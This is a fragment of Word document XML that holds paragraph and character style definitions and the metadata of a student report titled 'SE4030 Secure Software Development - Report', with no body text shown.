    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C73B1A"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C73B1A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008C216B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>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spdf@3.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54008C-5AEC-4149-8D32-5A0B1DCBE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23</Pages>
  <Words>7752</Words>
  <Characters>44193</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>368</Lines>
  <Paragraphs>103</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>51842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SE4030 Secure Software Development - Report</dc:title>
  <dc:subject/>
  <dc:creator>Kaveesha Gunasena</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Kaveesha Gunasena</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-26T18:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-27T08:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>